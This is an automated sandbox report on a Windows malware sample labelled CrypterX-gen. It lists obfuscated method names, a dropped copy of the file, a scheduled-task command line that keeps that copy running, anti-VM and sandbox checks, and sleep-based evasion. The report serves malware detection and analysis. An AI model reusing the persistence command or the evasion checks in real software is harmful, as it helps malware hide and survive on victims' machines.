              Source: nrQtAokXKaSn.exe.0.dr, Ig0R8XCtV1WwRvPOn1/xofaJsuXhoEZWIMVbx.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'w6KW6iuZ3C', 'NSEh8LD7V9', 'UwqhoJ6o5O', 'K5fh3tNoBD', 'fvIhI4MtSm', 'ENmhFPKWIG', 'omEh5DpTeV', 'DdhhGh6I9V'
              Source: nrQtAokXKaSn.exe.0.dr, Ig0R8XCtV1WwRvPOn1/M8y7RpwCvSV1iRZqGt.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'QckoesBIdE', 'BYrhkD7lnt', 'bOUhrVkeY6', 'XI8K8cJrgK', 'S0hKo16Hd2', 'C9aKGlyMn6', 'fcaKncAJlR', 'eT6KQo5CBm'
              Source: nrQtAokXKaSn.exe.0.dr, Ig0R8XCtV1WwRvPOn1/V89IOPlyboSofKxcqg.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'lyv1I26HJ3', 'NSEh8LD7V9', 'UwqhoJ6o5O', 'KrF0u61N2j', 'Ci10X3KiGR', 'tch00UKtac', 'd8J0NeP2MA', 'raI0hq4ftb'
              Source: nrQtAokXKaSn.exe.0.dr, Ig0R8XCtV1WwRvPOn1/cXSiYCEvRKO91GCE3S.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'dvGHDFjM1', 'rKJjTGMbWD', 'rtAjgVCNjh', 'QIojZhSlWt', 'I2FjEbEZoE', 'W1XjeaB1IA', 'uxEjRiIBJO', 'DfojfkBBD7'
              Source: nrQtAokXKaSn.exe.0.dr, Ig0R8XCtV1WwRvPOn1/gCYF5Hms6cLTc6i3Fq.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'RbA1O63flB', 'K5fh3tNoBD', 'fvIhI4MtSm', 'yg4Kqobx5C', 'i4FKYmCy6E', 'KGE0bkLocg', 'YqN0dC3xxO', 'RmDK3s2RXH'
              Source: nrQtAokXKaSn.exe.0.dr, Ig0R8XCtV1WwRvPOn1/AH98SaDrNFERXm3Hcd.csHigh entropy of concatenated method names: '.ctor', 'bKRCCtDOmB', 'yYxCWkcsU3', 'h8PComFFyA', 'fLyC1NFYFr', 'g1YChkUc4o', 'PPdCsTsGs3', 'kPmCEjukFe', 'Dispose', 'lNECD1q2WL'
              Source: nrQtAokXKaSn.exe.0.dr, Ig0R8XCtV1WwRvPOn1/VDWvhfkhVNLBgIpXl5.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'wYyoOGAXNE', 'K5fh3tNoBD', 'fvIhI4MtSm', 'ENmhFPKWIG', 'omEh5DpTeV', 'DdhhGh6I9V', 't6shnEPT5Z', 'VT9h232c2x'
              Source: 0.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.690000.0.unpack, Ig0R8XCtV1WwRvPOn1/O3Y8Pm4FFyAsLyNFYF.csHigh entropy of concatenated method names: '.cctor', 'ILvBvLsgDaWEH', 'gdMh44R7dy', 'mpWhJ0DwjU', 'I23hLHMKEG', 'nVyhZqdKfw', 'r9ThKqgi8D', 'x6BhnVXs0E', 'GXYhOjn8mG', 'Ba9hAJKArV'
              Source: 0.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.690000.0.unpack, Ig0R8XCtV1WwRvPOn1/RF0rtnYZvHqeZZQmad.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'rbWCBAlkmD', 'BYrhkD7lnt', 'bOUhrVkeY6', 'rZth64JWqh', 'N1GhBhq1bd', 'mnhhuai7hm', 'gVbhX8SHDY', 'UWJhWdhBPe'
              Source: 0.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.690000.0.unpack, Ig0R8XCtV1WwRvPOn1/XpgD7ix0Tc2tXfIVtE.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'A9mWBY6is4', 'K5fh3tNoBD', 'fvIhI4MtSm', 'NSEh8LD7V9', 'UwqhoJ6o5O', 'ENmhFPKWIG', 'omEh5DpTeV', 'DdhhGh6I9V'
              Source: 0.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.690000.0.unpack, Ig0R8XCtV1WwRvPOn1/xofaJsuXhoEZWIMVbx.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'w6KW6iuZ3C', 'NSEh8LD7V9', 'UwqhoJ6o5O', 'K5fh3tNoBD', 'fvIhI4MtSm', 'ENmhFPKWIG', 'omEh5DpTeV', 'DdhhGh6I9V'
              Source: 0.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.690000.0.unpack, Ig0R8XCtV1WwRvPOn1/M8y7RpwCvSV1iRZqGt.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'QckoesBIdE', 'BYrhkD7lnt', 'bOUhrVkeY6', 'XI8K8cJrgK', 'S0hKo16Hd2', 'C9aKGlyMn6', 'fcaKncAJlR', 'eT6KQo5CBm'
              Source: 0.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.690000.0.unpack, Ig0R8XCtV1WwRvPOn1/cXSiYCEvRKO91GCE3S.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'dvGHDFjM1', 'rKJjTGMbWD', 'rtAjgVCNjh', 'QIojZhSlWt', 'I2FjEbEZoE', 'W1XjeaB1IA', 'uxEjRiIBJO', 'DfojfkBBD7'
              Source: 0.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.690000.0.unpack, Ig0R8XCtV1WwRvPOn1/V89IOPlyboSofKxcqg.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'lyv1I26HJ3', 'NSEh8LD7V9', 'UwqhoJ6o5O', 'KrF0u61N2j', 'Ci10X3KiGR', 'tch00UKtac', 'd8J0NeP2MA', 'raI0hq4ftb'
              Source: 0.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.690000.0.unpack, Ig0R8XCtV1WwRvPOn1/VDWvhfkhVNLBgIpXl5.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'wYyoOGAXNE', 'K5fh3tNoBD', 'fvIhI4MtSm', 'ENmhFPKWIG', 'omEh5DpTeV', 'DdhhGh6I9V', 't6shnEPT5Z', 'VT9h232c2x'
              Source: 0.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.690000.0.unpack, Ig0R8XCtV1WwRvPOn1/AH98SaDrNFERXm3Hcd.csHigh entropy of concatenated method names: '.ctor', 'bKRCCtDOmB', 'yYxCWkcsU3', 'h8PComFFyA', 'fLyC1NFYFr', 'g1YChkUc4o', 'PPdCsTsGs3', 'kPmCEjukFe', 'Dispose', 'lNECD1q2WL'
              Source: 0.0.SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe.690000.0.unpack, Ig0R8XCtV1WwRvPOn1/gCYF5Hms6cLTc6i3Fq.csHigh entropy of concatenated method names: '.ctor', 'Dispose', 'RbA1O63flB', 'K5fh3tNoBD', 'fvIhI4MtSm', 'yg4Kqobx5C', 'i4FKYmCy6E', 'KGE0bkLocg', 'YqN0dC3xxO', 'RmDK3s2RXH'
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeFile created: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe

              Boot Survival

              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nrQtAokXKaSn" /XML "C:\Users\user\AppData\Local\Temp\tmp152E.tmp
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: Yara match File source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe PID: 4580, type: MEMORYSTR
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.318278212.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 0000000C.00000002.433160611.0000000002A31000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, 00000000.00000002.318278212.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, nrQtAokXKaSn.exe, 0000000C.00000002.433160611.0000000002A31000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 4748 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748 Thread sleep time: -23980767295822402s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748 Thread sleep time: -100000s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1572 Thread sleep count: 9837 > 30
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748 Thread sleep time: -99859s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748 Thread sleep time: -99734s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748 Thread sleep time: -99623s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748 Thread sleep time: -99500s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748 Thread sleep time: -99388s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748 Thread sleep time: -99252s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748 Thread sleep time: -99130s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748 Thread sleep time: -99000s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748 Thread sleep time: -98888s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748 Thread sleep time: -98779s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748 Thread sleep time: -98671s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748 Thread sleep time: -98558s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748 Thread sleep time: -98406s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748 Thread sleep time: -98281s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748 Thread sleep time: -98164s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748 Thread sleep time: -98047s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748 Thread sleep time: -97937s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748 Thread sleep time: -97828s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748 Thread sleep time: -97719s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748 Thread sleep time: -97608s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748 Thread sleep time: -97500s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748 Thread sleep time: -97387s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748 Thread sleep time: -97250s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748 Thread sleep time: -97140s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748 Thread sleep time: -97031s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748 Thread sleep time: -96918s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748 Thread sleep time: -96750s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748 Thread sleep time: -96624s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748 Thread sleep time: -96514s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748 Thread sleep time: -96406s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748 Thread sleep time: -96294s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748 Thread sleep time: -96186s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748 Thread sleep time: -96078s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748 Thread sleep time: -95968s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748 Thread sleep time: -95859s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748 Thread sleep time: -95750s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748 Thread sleep time: -95640s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748 Thread sleep time: -95530s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748 Thread sleep time: -95422s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748 Thread sleep time: -95310s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748 Thread sleep time: -95187s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748 Thread sleep time: -95078s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748 Thread sleep time: -94969s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748 Thread sleep time: -94812s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748 Thread sleep time: -94703s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748 Thread sleep time: -94593s >= -30000s
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe TID: 1748 Thread sleep time: -94484s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 3476 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 Thread sleep time: -19369081277395017s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 Thread sleep time: -100000s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 4636 Thread sleep count: 9758 > 30
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 Thread sleep time: -99875s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 Thread sleep time: -99764s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 Thread sleep time: -99656s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 Thread sleep time: -99546s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 Thread sleep time: -99437s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 Thread sleep time: -99323s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 Thread sleep time: -99218s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 Thread sleep time: -99109s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 Thread sleep time: -99000s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 Thread sleep time: -98890s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 Thread sleep time: -98725s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 Thread sleep time: -98604s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 Thread sleep time: -98484s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 Thread sleep time: -98296s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 Thread sleep time: -98186s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 Thread sleep time: -98053s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 Thread sleep time: -97893s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 Thread sleep time: -97735s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 Thread sleep time: -97594s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 Thread sleep time: -97454s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 Thread sleep time: -97297s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 Thread sleep time: -97151s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 Thread sleep time: -96085s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 Thread sleep time: -95901s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 Thread sleep time: -93632s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 Thread sleep time: -93516s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 Thread sleep time: -93344s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 Thread sleep time: -93203s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 Thread sleep time: -93089s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 Thread sleep time: -92977s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 Thread sleep time: -92875s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 Thread sleep time: -92766s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 Thread sleep time: -92656s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 Thread sleep time: -92547s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 Thread sleep time: -92437s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 Thread sleep time: -92328s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 Thread sleep time: -92219s >= -30000s
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe TID: 6080 Thread sleep time: -92109s >= -30000s
              Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
              Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Window / User API: threadDelayed 9837
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Window / User API: threadDelayed 9758
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Process information queried: ProcessInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Thread delayed: delay times:
                  922337203685477 (2x), 100000, 99859, 99734, 99623, 99500, 99388, 99252, 99130, 99000,
                  98888, 98779, 98671, 98558, 98406, 98281, 98164, 98047, 97937, 97828, 97719, 97608,
                  97500, 97387, 97250, 97140, 97031, 96918, 96750, 96624, 96514, 96406, 96294, 96186,
                  96078, 95968, 95859, 95750, 95640, 95530, 95422, 95310, 95187, 95078, 94969, 94812,
                  94703, 94593, 94484
              Source: C:\Users\user\AppData\Roaming\nrQtAokXKaSn.exe | Thread delayed: delay times:
                  922337203685477 (2x), 100000, 99875, 99764, 99656, 99546, 99437, 99323, 99218, 99109,
                  99000, 98890, 98725, 98604, 98484, 98296, 98186, 98053, 97893, 97735, 97594, 97454,
                  97297, 97151, 96085, 95901, 93632, 93516, 93344, 93203, 93089, 92977, 92875, 92766,
                  92656, 92547, 92437, 92328, 92219, 92109
              Source: nrQtAokXKaSn.exe, 0000000C.00000002.433160611.0000000002A31000.00000004.00000800.00020000.00000000.sdmp | Binary or memory strings:
                  VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
                  vmware
                  C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                  SOFTWARE\VMware, Inc.\VMware Tools
                  VMWARE
                  InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                  VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                  VMware SVGA II
                  vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Process token adjusted: Debug
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Process token adjusted: Debug
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Code function: 11_2_06925D08 LdrInitializeThunk,
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe | Memory allocated: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion

              Source: SecuriteInfo.com.Win32.CrypterX-gen.16043.3621.exe, Ig0R8XCtV1WwRvPOn1/O3Y8Pm4FFyAsLyNFYF.cs | Reference to suspicious API methods: ('bDfhXlyiGS', 'GetProcAddress@kernel32'), ('BOehSv6EXP', 'LoadLibrary@kernel32')
              Source: nrQtAokXKaSn.exe.0.dr, Ig0R8XCtV1WwRvPOn1/O3Y8Pm4FFyAsLyNFYF.cs | Reference to suspicious API methods: ('bDfhXlyiGS', 'GetProcAddress@kernel32'), ('BOehSv6EXP', 'LoadLibrary@kernel32')
